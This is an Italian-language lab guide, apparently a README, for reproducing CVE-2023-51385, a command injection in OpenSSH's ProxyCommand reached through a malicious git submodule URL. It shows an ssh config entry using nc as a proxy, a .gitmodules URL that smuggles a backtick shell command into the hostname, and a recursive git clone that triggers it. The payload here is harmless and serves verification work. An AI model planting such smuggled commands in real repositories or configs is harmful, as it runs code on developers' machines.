
Laboratorio di riproduzione per CVE-2023-51385: iniezione di comandi in OpenSSH ProxyCommand tramite URL di git submodule malintenzionati. Guida passo-passo per verificare la vulnerabilità.
Per prima cosa, aggiungi il seguente contenuto al file ~/.ssh/config:
host *.example.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
Nelle dichiarazioni del file .gitmodules è presente un'iniezione di comandi:
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar
Dopo aver completato la configurazione, esegui il comando seguente per attivare:
git clone https://github.com/LtmThink/CVE-2023-51385_test --recurse-submodules
Se l'esecuzione ha successo, verrà generato un file cve.txt nella directory CVE-2023-51385_test.

Nota: OpenSSH deve essere < 9.6p1
Per maggiori dettagli, consulta questo blog:
"# cve-2023-51385"